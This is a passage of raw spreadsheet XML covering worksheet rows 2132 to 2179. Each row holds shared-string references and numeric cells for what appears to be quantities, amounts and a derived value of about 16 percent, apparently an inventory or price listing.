      <c r="E2132" s="238" t="s">
        <v>8849</v>
      </c>
      <c r="F2132" s="238" t="s">
        <v>632</v>
      </c>
      <c r="G2132" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2132" s="10">
        <v>6</v>
      </c>
      <c r="I2132" s="14">
        <v>210</v>
      </c>
      <c r="J2132" s="15">
        <v>33.6</v>
      </c>
      <c r="K2132" s="16"/>
    </row>
    <row r="2133" spans="2:11">
      <c r="B2133" s="9">
        <v>2167</v>
      </c>
      <c r="C2133" s="238" t="s">
        <v>10568</v>
      </c>
      <c r="D2133" s="238" t="s">
        <v>10569</v>
      </c>
      <c r="E2133" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F2133" s="238" t="s">
        <v>10570</v>
      </c>
      <c r="G2133" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2133" s="10">
        <v>21</v>
      </c>
      <c r="I2133" s="14">
        <v>63</v>
      </c>
      <c r="J2133" s="15">
        <v>10.08</v>
      </c>
      <c r="K2133" s="16"/>
    </row>
    <row r="2134" spans="2:11">
      <c r="B2134" s="9">
        <v>2168</v>
      </c>
      <c r="C2134" s="238" t="s">
        <v>10571</v>
      </c>
      <c r="D2134" s="238" t="s">
        <v>10572</v>
      </c>
      <c r="E2134" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F2134" s="238" t="s">
        <v>632</v>
      </c>
      <c r="G2134" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2134" s="10">
        <v>23</v>
      </c>
      <c r="I2134" s="14">
        <v>67</v>
      </c>
      <c r="J2134" s="15">
        <v>10.7088</v>
      </c>
      <c r="K2134" s="16"/>
    </row>
    <row r="2135" spans="2:11">
      <c r="B2135" s="9">
        <v>2169</v>
      </c>
      <c r="C2135" s="238" t="s">
        <v>10573</v>
      </c>
      <c r="D2135" s="238" t="s">
        <v>10574</v>
      </c>
      <c r="E2135" s="238" t="s">
        <v>7197</v>
      </c>
      <c r="F2135" s="238" t="s">
        <v>632</v>
      </c>
      <c r="G2135" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2135" s="10">
        <v>3</v>
      </c>
      <c r="I2135" s="14">
        <v>231</v>
      </c>
      <c r="J2135" s="15">
        <v>36.96</v>
      </c>
      <c r="K2135" s="16"/>
    </row>
    <row r="2136" spans="2:11">
      <c r="B2136" s="9">
        <v>2170</v>
      </c>
      <c r="C2136" s="238" t="s">
        <v>10575</v>
      </c>
      <c r="D2136" s="238" t="s">
        <v>10576</v>
      </c>
      <c r="E2136" s="238" t="s">
        <v>4755</v>
      </c>
      <c r="F2136" s="238" t="s">
        <v>632</v>
      </c>
      <c r="G2136" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2136" s="10">
        <v>4</v>
      </c>
      <c r="I2136" s="14">
        <v>167</v>
      </c>
      <c r="J2136" s="15">
        <v>26.72</v>
      </c>
      <c r="K2136" s="16"/>
    </row>
    <row r="2137" spans="2:11">
      <c r="B2137" s="9">
        <v>2171</v>
      </c>
      <c r="C2137" s="238" t="s">
        <v>10577</v>
      </c>
      <c r="D2137" s="238" t="s">
        <v>10578</v>
      </c>
      <c r="E2137" s="238" t="s">
        <v>10579</v>
      </c>
      <c r="F2137" s="238" t="s">
        <v>632</v>
      </c>
      <c r="G2137" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2137" s="10">
        <v>14</v>
      </c>
      <c r="I2137" s="14">
        <v>2326</v>
      </c>
      <c r="J2137" s="15">
        <v>372.1536</v>
      </c>
      <c r="K2137" s="16"/>
    </row>
    <row r="2138" spans="2:11">
      <c r="B2138" s="9">
        <v>2172</v>
      </c>
      <c r="C2138" s="238" t="s">
        <v>10580</v>
      </c>
      <c r="D2138" s="238" t="s">
        <v>10581</v>
      </c>
      <c r="E2138" s="238" t="s">
        <v>7949</v>
      </c>
      <c r="F2138" s="238" t="s">
        <v>632</v>
      </c>
      <c r="G2138" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2138" s="10">
        <v>9</v>
      </c>
      <c r="I2138" s="14">
        <v>122</v>
      </c>
      <c r="J2138" s="15">
        <v>19.5264</v>
      </c>
      <c r="K2138" s="16"/>
    </row>
    <row r="2139" spans="2:11">
      <c r="B2139" s="9">
        <v>2173</v>
      </c>
      <c r="C2139" s="238" t="s">
        <v>10582</v>
      </c>
      <c r="D2139" s="238" t="s">
        <v>10583</v>
      </c>
      <c r="E2139" s="238" t="s">
        <v>6726</v>
      </c>
      <c r="F2139" s="238" t="s">
        <v>10584</v>
      </c>
      <c r="G2139" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2139" s="10">
        <v>3</v>
      </c>
      <c r="I2139" s="14">
        <v>97.5</v>
      </c>
      <c r="J2139" s="15">
        <v>15.6</v>
      </c>
      <c r="K2139" s="16"/>
    </row>
    <row r="2140" spans="2:11">
      <c r="B2140" s="9">
        <v>2174</v>
      </c>
      <c r="C2140" s="238" t="s">
        <v>10585</v>
      </c>
      <c r="D2140" s="238" t="s">
        <v>10586</v>
      </c>
      <c r="E2140" s="238" t="s">
        <v>6726</v>
      </c>
      <c r="F2140" s="238" t="s">
        <v>632</v>
      </c>
      <c r="G2140" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2140" s="10">
        <v>3</v>
      </c>
      <c r="I2140" s="14">
        <v>135</v>
      </c>
      <c r="J2140" s="15">
        <v>21.6</v>
      </c>
      <c r="K2140" s="16"/>
    </row>
    <row r="2141" spans="2:11">
      <c r="B2141" s="9">
        <v>2175</v>
      </c>
      <c r="C2141" s="238" t="s">
        <v>10587</v>
      </c>
      <c r="D2141" s="238" t="s">
        <v>10588</v>
      </c>
      <c r="E2141" s="238" t="s">
        <v>9275</v>
      </c>
      <c r="F2141" s="238" t="s">
        <v>4249</v>
      </c>
      <c r="G2141" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2141" s="10">
        <v>6</v>
      </c>
      <c r="I2141" s="14">
        <v>177.4</v>
      </c>
      <c r="J2141" s="15">
        <v>28.3872</v>
      </c>
      <c r="K2141" s="16"/>
    </row>
    <row r="2142" spans="2:11">
      <c r="B2142" s="9">
        <v>2176</v>
      </c>
      <c r="C2142" s="238" t="s">
        <v>10589</v>
      </c>
      <c r="D2142" s="238" t="s">
        <v>10590</v>
      </c>
      <c r="E2142" s="238" t="s">
        <v>9060</v>
      </c>
      <c r="F2142" s="238" t="s">
        <v>10591</v>
      </c>
      <c r="G2142" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2142" s="10">
        <v>5</v>
      </c>
      <c r="I2142" s="14">
        <v>217.4</v>
      </c>
      <c r="J2142" s="15">
        <v>34.784</v>
      </c>
      <c r="K2142" s="16"/>
    </row>
    <row r="2143" spans="2:11">
      <c r="B2143" s="9">
        <v>2177</v>
      </c>
      <c r="C2143" s="238" t="s">
        <v>10592</v>
      </c>
      <c r="D2143" s="238" t="s">
        <v>10593</v>
      </c>
      <c r="E2143" s="238" t="s">
        <v>9060</v>
      </c>
      <c r="F2143" s="238" t="s">
        <v>4249</v>
      </c>
      <c r="G2143" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2143" s="10">
        <v>5</v>
      </c>
      <c r="I2143" s="14">
        <v>232.5</v>
      </c>
      <c r="J2143" s="15">
        <v>37.2</v>
      </c>
      <c r="K2143" s="16"/>
    </row>
    <row r="2144" spans="2:11">
      <c r="B2144" s="9">
        <v>2178</v>
      </c>
      <c r="C2144" s="238" t="s">
        <v>10594</v>
      </c>
      <c r="D2144" s="238" t="s">
        <v>10595</v>
      </c>
      <c r="E2144" s="238" t="s">
        <v>5354</v>
      </c>
      <c r="F2144" s="238" t="s">
        <v>328</v>
      </c>
      <c r="G2144" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2144" s="10">
        <v>24</v>
      </c>
      <c r="I2144" s="14">
        <v>143.97</v>
      </c>
      <c r="J2144" s="15">
        <v>23.04</v>
      </c>
      <c r="K2144" s="16"/>
    </row>
    <row r="2145" spans="2:11">
      <c r="B2145" s="9">
        <v>2179</v>
      </c>
      <c r="C2145" s="238" t="s">
        <v>10596</v>
      </c>
      <c r="D2145" s="238" t="s">
        <v>10597</v>
      </c>
      <c r="E2145" s="238" t="s">
        <v>10598</v>
      </c>
      <c r="F2145" s="238" t="s">
        <v>328</v>
      </c>
      <c r="G2145" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2145" s="10">
        <v>10</v>
      </c>
      <c r="I2145" s="14">
        <v>626.21</v>
      </c>
      <c r="J2145" s="15">
        <v>100.192</v>
      </c>
      <c r="K2145" s="16"/>
    </row>
    <row r="2146" spans="2:11">
      <c r="B2146" s="9">
        <v>2180</v>
      </c>
      <c r="C2146" s="238" t="s">
        <v>10599</v>
      </c>
      <c r="D2146" s="238" t="s">
        <v>10600</v>
      </c>
      <c r="E2146" s="238" t="s">
        <v>9013</v>
      </c>
      <c r="F2146" s="238" t="s">
        <v>328</v>
      </c>
      <c r="G2146" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2146" s="10">
        <v>65</v>
      </c>
      <c r="I2146" s="14">
        <v>635</v>
      </c>
      <c r="J2146" s="15">
        <v>101.608</v>
      </c>
      <c r="K2146" s="16"/>
    </row>
    <row r="2147" spans="2:11">
      <c r="B2147" s="9">
        <v>2181</v>
      </c>
      <c r="C2147" s="238" t="s">
        <v>10601</v>
      </c>
      <c r="D2147" s="238" t="s">
        <v>10602</v>
      </c>
      <c r="E2147" s="238" t="s">
        <v>4837</v>
      </c>
      <c r="F2147" s="238" t="s">
        <v>328</v>
      </c>
      <c r="G2147" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2147" s="10">
        <v>2</v>
      </c>
      <c r="I2147" s="14">
        <v>1679</v>
      </c>
      <c r="J2147" s="15">
        <v>268.64</v>
      </c>
      <c r="K2147" s="16"/>
    </row>
    <row r="2148" spans="2:11">
      <c r="B2148" s="9">
        <v>2182</v>
      </c>
      <c r="C2148" s="238" t="s">
        <v>10603</v>
      </c>
      <c r="D2148" s="238" t="s">
        <v>6478</v>
      </c>
      <c r="E2148" s="238" t="s">
        <v>10604</v>
      </c>
      <c r="F2148" s="9"/>
      <c r="G2148" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2148" s="10">
        <v>50</v>
      </c>
      <c r="I2148" s="14">
        <v>10.24</v>
      </c>
      <c r="J2148" s="15">
        <v>1.6</v>
      </c>
      <c r="K2148" s="16"/>
    </row>
    <row r="2149" spans="2:11">
      <c r="B2149" s="9">
        <v>2183</v>
      </c>
      <c r="C2149" s="238" t="s">
        <v>10605</v>
      </c>
      <c r="D2149" s="238" t="s">
        <v>10606</v>
      </c>
      <c r="E2149" s="238" t="s">
        <v>4681</v>
      </c>
      <c r="F2149" s="238" t="s">
        <v>10607</v>
      </c>
      <c r="G2149" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2149" s="10">
        <v>2</v>
      </c>
      <c r="I2149" s="14">
        <v>158.36</v>
      </c>
      <c r="J2149" s="15">
        <v>25.3376</v>
      </c>
      <c r="K2149" s="16"/>
    </row>
    <row r="2150" spans="2:11">
      <c r="B2150" s="9">
        <v>2184</v>
      </c>
      <c r="C2150" s="238" t="s">
        <v>10608</v>
      </c>
      <c r="D2150" s="238" t="s">
        <v>10609</v>
      </c>
      <c r="E2150" s="238" t="s">
        <v>4939</v>
      </c>
      <c r="F2150" s="238" t="s">
        <v>10607</v>
      </c>
      <c r="G2150" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2150" s="10">
        <v>2</v>
      </c>
      <c r="I2150" s="14">
        <v>58.4</v>
      </c>
      <c r="J2150" s="15">
        <v>9.344</v>
      </c>
      <c r="K2150" s="16"/>
    </row>
    <row r="2151" spans="2:11">
      <c r="B2151" s="9">
        <v>2185</v>
      </c>
      <c r="C2151" s="238" t="s">
        <v>10610</v>
      </c>
      <c r="D2151" s="238" t="s">
        <v>10611</v>
      </c>
      <c r="E2151" s="238" t="s">
        <v>5311</v>
      </c>
      <c r="F2151" s="238" t="s">
        <v>10607</v>
      </c>
      <c r="G2151" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2151" s="10">
        <v>3</v>
      </c>
      <c r="I2151" s="14">
        <v>8</v>
      </c>
      <c r="J2151" s="15">
        <v>1.2816</v>
      </c>
      <c r="K2151" s="16"/>
    </row>
    <row r="2152" spans="2:11">
      <c r="B2152" s="9">
        <v>2186</v>
      </c>
      <c r="C2152" s="238" t="s">
        <v>10612</v>
      </c>
      <c r="D2152" s="238" t="s">
        <v>10613</v>
      </c>
      <c r="E2152" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2152" s="238" t="s">
        <v>10614</v>
      </c>
      <c r="G2152" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2152" s="10">
        <v>5</v>
      </c>
      <c r="I2152" s="14">
        <v>72.82</v>
      </c>
      <c r="J2152" s="15">
        <v>11.648</v>
      </c>
      <c r="K2152" s="16"/>
    </row>
    <row r="2153" spans="2:11">
      <c r="B2153" s="9">
        <v>2187</v>
      </c>
      <c r="C2153" s="238" t="s">
        <v>10615</v>
      </c>
      <c r="D2153" s="238" t="s">
        <v>10616</v>
      </c>
      <c r="E2153" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2153" s="238" t="s">
        <v>10617</v>
      </c>
      <c r="G2153" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2153" s="10">
        <v>7</v>
      </c>
      <c r="I2153" s="14">
        <v>527.43</v>
      </c>
      <c r="J2153" s="15">
        <v>84.392</v>
      </c>
      <c r="K2153" s="16"/>
    </row>
    <row r="2154" spans="2:11">
      <c r="B2154" s="9">
        <v>2188</v>
      </c>
      <c r="C2154" s="238" t="s">
        <v>10618</v>
      </c>
      <c r="D2154" s="238" t="s">
        <v>10619</v>
      </c>
      <c r="E2154" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2154" s="238" t="s">
        <v>10621</v>
      </c>
      <c r="G2154" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2154" s="10">
        <v>10</v>
      </c>
      <c r="I2154" s="14">
        <v>13.46</v>
      </c>
      <c r="J2154" s="15">
        <v>2.16</v>
      </c>
      <c r="K2154" s="16"/>
    </row>
    <row r="2155" spans="2:11">
      <c r="B2155" s="9">
        <v>2189</v>
      </c>
      <c r="C2155" s="238" t="s">
        <v>10622</v>
      </c>
      <c r="D2155" s="238" t="s">
        <v>10623</v>
      </c>
      <c r="E2155" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2155" s="238" t="s">
        <v>9713</v>
      </c>
      <c r="G2155" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2155" s="10">
        <v>109</v>
      </c>
      <c r="I2155" s="14">
        <v>161.65</v>
      </c>
      <c r="J2155" s="15">
        <v>25.8112</v>
      </c>
      <c r="K2155" s="16"/>
    </row>
    <row r="2156" spans="2:11">
      <c r="B2156" s="9">
        <v>2190</v>
      </c>
      <c r="C2156" s="238" t="s">
        <v>10624</v>
      </c>
      <c r="D2156" s="238" t="s">
        <v>10625</v>
      </c>
      <c r="E2156" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2156" s="238" t="s">
        <v>10626</v>
      </c>
      <c r="G2156" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2156" s="10">
        <v>119</v>
      </c>
      <c r="I2156" s="14">
        <v>229.33</v>
      </c>
      <c r="J2156" s="15">
        <v>36.7472</v>
      </c>
      <c r="K2156" s="16"/>
    </row>
    <row r="2157" spans="2:11">
      <c r="B2157" s="9">
        <v>2191</v>
      </c>
      <c r="C2157" s="238" t="s">
        <v>10627</v>
      </c>
      <c r="D2157" s="9"/>
      <c r="E2157" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2157" s="238" t="s">
        <v>6580</v>
      </c>
      <c r="G2157" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2157" s="10">
        <v>15</v>
      </c>
      <c r="I2157" s="14">
        <v>1115.61</v>
      </c>
      <c r="J2157" s="15">
        <v>178.488</v>
      </c>
      <c r="K2157" s="16"/>
    </row>
    <row r="2158" spans="2:11">
      <c r="B2158" s="9">
        <v>2192</v>
      </c>
      <c r="C2158" s="238" t="s">
        <v>10628</v>
      </c>
      <c r="D2158" s="238" t="s">
        <v>10629</v>
      </c>
      <c r="E2158" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2158" s="238" t="s">
        <v>10630</v>
      </c>
      <c r="G2158" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2158" s="10">
        <v>14</v>
      </c>
      <c r="I2158" s="14">
        <v>48.67</v>
      </c>
      <c r="J2158" s="15">
        <v>7.7952</v>
      </c>
      <c r="K2158" s="16"/>
    </row>
    <row r="2159" spans="2:11">
      <c r="B2159" s="9">
        <v>2193</v>
      </c>
      <c r="C2159" s="238" t="s">
        <v>10631</v>
      </c>
      <c r="D2159" s="238" t="s">
        <v>10632</v>
      </c>
      <c r="E2159" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2159" s="238" t="s">
        <v>10633</v>
      </c>
      <c r="G2159" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2159" s="10">
        <v>4</v>
      </c>
      <c r="I2159" s="14">
        <v>252.43</v>
      </c>
      <c r="J2159" s="15">
        <v>40.3904</v>
      </c>
      <c r="K2159" s="16"/>
    </row>
    <row r="2160" spans="2:11">
      <c r="B2160" s="9">
        <v>2194</v>
      </c>
      <c r="C2160" s="238" t="s">
        <v>10634</v>
      </c>
      <c r="D2160" s="238" t="s">
        <v>10635</v>
      </c>
      <c r="E2160" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2160" s="238" t="s">
        <v>10636</v>
      </c>
      <c r="G2160" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2160" s="10">
        <v>25</v>
      </c>
      <c r="I2160" s="14">
        <v>207.22</v>
      </c>
      <c r="J2160" s="15">
        <v>33.16</v>
      </c>
      <c r="K2160" s="16"/>
    </row>
    <row r="2161" spans="2:11">
      <c r="B2161" s="9">
        <v>2195</v>
      </c>
      <c r="C2161" s="238" t="s">
        <v>10637</v>
      </c>
      <c r="D2161" s="238" t="s">
        <v>10638</v>
      </c>
      <c r="E2161" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2161" s="238" t="s">
        <v>10639</v>
      </c>
      <c r="G2161" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2161" s="10">
        <v>14</v>
      </c>
      <c r="I2161" s="14">
        <v>24.32</v>
      </c>
      <c r="J2161" s="15">
        <v>3.8976</v>
      </c>
      <c r="K2161" s="16"/>
    </row>
    <row r="2162" spans="2:11">
      <c r="B2162" s="9">
        <v>2196</v>
      </c>
      <c r="C2162" s="238" t="s">
        <v>10640</v>
      </c>
      <c r="D2162" s="238" t="s">
        <v>10641</v>
      </c>
      <c r="E2162" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2162" s="238" t="s">
        <v>10642</v>
      </c>
      <c r="G2162" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2162" s="10">
        <v>63</v>
      </c>
      <c r="I2162" s="14">
        <v>136.8</v>
      </c>
      <c r="J2162" s="15">
        <v>21.8736</v>
      </c>
      <c r="K2162" s="16"/>
    </row>
    <row r="2163" spans="2:11">
      <c r="B2163" s="9">
        <v>2197</v>
      </c>
      <c r="C2163" s="238" t="s">
        <v>10643</v>
      </c>
      <c r="D2163" s="9"/>
      <c r="E2163" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2163" s="238" t="s">
        <v>10644</v>
      </c>
      <c r="G2163" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2163" s="10">
        <v>155</v>
      </c>
      <c r="I2163" s="14">
        <v>902.9</v>
      </c>
      <c r="J2163" s="15">
        <v>144.584</v>
      </c>
      <c r="K2163" s="16"/>
    </row>
    <row r="2164" spans="2:11">
      <c r="B2164" s="9">
        <v>2198</v>
      </c>
      <c r="C2164" s="238" t="s">
        <v>10645</v>
      </c>
      <c r="D2164" s="238" t="s">
        <v>10646</v>
      </c>
      <c r="E2164" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2164" s="238" t="s">
        <v>10647</v>
      </c>
      <c r="G2164" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2164" s="10">
        <v>260</v>
      </c>
      <c r="I2164" s="14">
        <v>842.28</v>
      </c>
      <c r="J2164" s="15">
        <v>134.784</v>
      </c>
      <c r="K2164" s="16"/>
    </row>
    <row r="2165" spans="2:11">
      <c r="B2165" s="9">
        <v>2199</v>
      </c>
      <c r="C2165" s="238" t="s">
        <v>10648</v>
      </c>
      <c r="D2165" s="238" t="s">
        <v>10649</v>
      </c>
      <c r="E2165" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2165" s="238" t="s">
        <v>10650</v>
      </c>
      <c r="G2165" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2165" s="10">
        <v>107</v>
      </c>
      <c r="I2165" s="14">
        <v>580.83</v>
      </c>
      <c r="J2165" s="15">
        <v>92.9616</v>
      </c>
      <c r="K2165" s="16"/>
    </row>
    <row r="2166" spans="2:11">
      <c r="B2166" s="9">
        <v>2200</v>
      </c>
      <c r="C2166" s="238" t="s">
        <v>10651</v>
      </c>
      <c r="D2166" s="238" t="s">
        <v>10652</v>
      </c>
      <c r="E2166" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2166" s="238" t="s">
        <v>10653</v>
      </c>
      <c r="G2166" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2166" s="10">
        <v>36</v>
      </c>
      <c r="I2166" s="14">
        <v>80.84</v>
      </c>
      <c r="J2166" s="15">
        <v>12.96</v>
      </c>
      <c r="K2166" s="16"/>
    </row>
    <row r="2167" spans="2:11">
      <c r="B2167" s="9">
        <v>2201</v>
      </c>
      <c r="C2167" s="238" t="s">
        <v>10654</v>
      </c>
      <c r="D2167" s="238" t="s">
        <v>10655</v>
      </c>
      <c r="E2167" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2167" s="238" t="s">
        <v>10656</v>
      </c>
      <c r="G2167" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2167" s="10">
        <v>94</v>
      </c>
      <c r="I2167" s="14">
        <v>143.11</v>
      </c>
      <c r="J2167" s="15">
        <v>22.8608</v>
      </c>
      <c r="K2167" s="16"/>
    </row>
    <row r="2168" spans="2:11">
      <c r="B2168" s="9">
        <v>2202</v>
      </c>
      <c r="C2168" s="238" t="s">
        <v>10657</v>
      </c>
      <c r="D2168" s="238" t="s">
        <v>10658</v>
      </c>
      <c r="E2168" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2168" s="238" t="s">
        <v>10659</v>
      </c>
      <c r="G2168" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2168" s="10">
        <v>52</v>
      </c>
      <c r="I2168" s="14">
        <v>25.37</v>
      </c>
      <c r="J2168" s="15">
        <v>4.0768</v>
      </c>
      <c r="K2168" s="16"/>
    </row>
    <row r="2169" spans="2:11">
      <c r="B2169" s="9">
        <v>2203</v>
      </c>
      <c r="C2169" s="238" t="s">
        <v>10660</v>
      </c>
      <c r="D2169" s="238" t="s">
        <v>10661</v>
      </c>
      <c r="E2169" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2169" s="238" t="s">
        <v>2906</v>
      </c>
      <c r="G2169" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2169" s="10">
        <v>9</v>
      </c>
      <c r="I2169" s="14">
        <v>1088.81</v>
      </c>
      <c r="J2169" s="15">
        <v>174.2112</v>
      </c>
      <c r="K2169" s="16"/>
    </row>
    <row r="2170" spans="2:11">
      <c r="B2170" s="9">
        <v>2204</v>
      </c>
      <c r="C2170" s="238" t="s">
        <v>10662</v>
      </c>
      <c r="D2170" s="238" t="s">
        <v>10663</v>
      </c>
      <c r="E2170" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2170" s="238" t="s">
        <v>10664</v>
      </c>
      <c r="G2170" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2170" s="10">
        <v>18</v>
      </c>
      <c r="I2170" s="14">
        <v>59.05</v>
      </c>
      <c r="J2170" s="15">
        <v>9.4464</v>
      </c>
      <c r="K2170" s="16"/>
    </row>
    <row r="2171" spans="2:11">
      <c r="B2171" s="9">
        <v>2205</v>
      </c>
      <c r="C2171" s="238" t="s">
        <v>10665</v>
      </c>
      <c r="D2171" s="238" t="s">
        <v>10666</v>
      </c>
      <c r="E2171" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2171" s="238" t="s">
        <v>10667</v>
      </c>
      <c r="G2171" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2171" s="10">
        <v>19</v>
      </c>
      <c r="I2171" s="14">
        <v>82.32</v>
      </c>
      <c r="J2171" s="15">
        <v>13.1632</v>
      </c>
      <c r="K2171" s="16"/>
    </row>
    <row r="2172" spans="2:11">
      <c r="B2172" s="9">
        <v>2206</v>
      </c>
      <c r="C2172" s="238" t="s">
        <v>10668</v>
      </c>
      <c r="D2172" s="238" t="s">
        <v>10669</v>
      </c>
      <c r="E2172" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2172" s="238" t="s">
        <v>10670</v>
      </c>
      <c r="G2172" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2172" s="10">
        <v>398</v>
      </c>
      <c r="I2172" s="14">
        <v>220.21</v>
      </c>
      <c r="J2172" s="15">
        <v>35.024</v>
      </c>
      <c r="K2172" s="16"/>
    </row>
    <row r="2173" spans="2:11">
      <c r="B2173" s="9">
        <v>2207</v>
      </c>
      <c r="C2173" s="238" t="s">
        <v>10671</v>
      </c>
      <c r="D2173" s="238" t="s">
        <v>10672</v>
      </c>
      <c r="E2173" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2173" s="238" t="s">
        <v>10673</v>
      </c>
      <c r="G2173" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2173" s="10">
        <v>538</v>
      </c>
      <c r="I2173" s="14">
        <v>502.78</v>
      </c>
      <c r="J2173" s="15">
        <v>80.0544</v>
      </c>
      <c r="K2173" s="16"/>
    </row>
    <row r="2174" spans="2:11">
      <c r="B2174" s="9">
        <v>2208</v>
      </c>
      <c r="C2174" s="238" t="s">
        <v>10674</v>
      </c>
      <c r="D2174" s="238" t="s">
        <v>10675</v>
      </c>
      <c r="E2174" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2174" s="238" t="s">
        <v>10676</v>
      </c>
      <c r="G2174" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2174" s="10">
        <v>126</v>
      </c>
      <c r="I2174" s="14">
        <v>126.25</v>
      </c>
      <c r="J2174" s="15">
        <v>20.16</v>
      </c>
      <c r="K2174" s="16"/>
    </row>
    <row r="2175" spans="2:11">
      <c r="B2175" s="9">
        <v>2209</v>
      </c>
      <c r="C2175" s="238" t="s">
        <v>10677</v>
      </c>
      <c r="D2175" s="238" t="s">
        <v>10678</v>
      </c>
      <c r="E2175" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2175" s="238" t="s">
        <v>10679</v>
      </c>
      <c r="G2175" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2175" s="10">
        <v>70</v>
      </c>
      <c r="I2175" s="14">
        <v>376.81</v>
      </c>
      <c r="J2175" s="15">
        <v>60.256</v>
      </c>
      <c r="K2175" s="16"/>
    </row>
    <row r="2176" spans="2:11">
      <c r="B2176" s="9">
        <v>2210</v>
      </c>
      <c r="C2176" s="238" t="s">
        <v>10680</v>
      </c>
      <c r="D2176" s="238" t="s">
        <v>10681</v>
      </c>
      <c r="E2176" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2176" s="238" t="s">
        <v>10682</v>
      </c>
      <c r="G2176" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2176" s="10">
        <v>88</v>
      </c>
      <c r="I2176" s="14">
        <v>169.6</v>
      </c>
      <c r="J2176" s="15">
        <v>27.1744</v>
      </c>
      <c r="K2176" s="16"/>
    </row>
    <row r="2177" spans="2:11">
      <c r="B2177" s="9">
        <v>2211</v>
      </c>
      <c r="C2177" s="238" t="s">
        <v>10683</v>
      </c>
      <c r="D2177" s="238" t="s">
        <v>10684</v>
      </c>
      <c r="E2177" s="238" t="s">
        <v>8319</v>
      </c>
      <c r="F2177" s="238" t="s">
        <v>10685</v>
      </c>
      <c r="G2177" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2177" s="10">
        <v>5</v>
      </c>
      <c r="I2177" s="14">
        <v>1.46</v>
      </c>
      <c r="J2177" s="15">
        <v>0.232</v>
      </c>
      <c r="K2177" s="16"/>
    </row>
    <row r="2178" spans="2:11">
      <c r="B2178" s="9">
        <v>2212</v>
      </c>
      <c r="C2178" s="238" t="s">
        <v>10686</v>
      </c>
      <c r="D2178" s="238" t="s">
        <v>10687</v>
      </c>
      <c r="E2178" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2178" s="238" t="s">
        <v>10688</v>
      </c>
      <c r="G2178" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2178" s="10">
        <v>88</v>
      </c>
      <c r="I2178" s="14">
        <v>76</v>
      </c>
      <c r="J2178" s="15">
        <v>12.1088</v>
      </c>
      <c r="K2178" s="16"/>
    </row>
    <row r="2179" spans="2:11">
      <c r="B2179" s="9">
        <v>2213</v>
      </c>
      <c r="C2179" s="238" t="s">
        <v>10689</v>
      </c>
      <c r="D2179" s="238" t="s">
        <v>10690</v>
      </c>
      <c r="E2179" s="238" t="s">
        <v>10620</v>
      </c>
      <c r="F2179" s="238" t="s">
        <v>10691</v>
      </c>
      <c r="G2179" s="237" t="s">
        <v>507</v>
      </c>
      <c r="H2179" s="10">
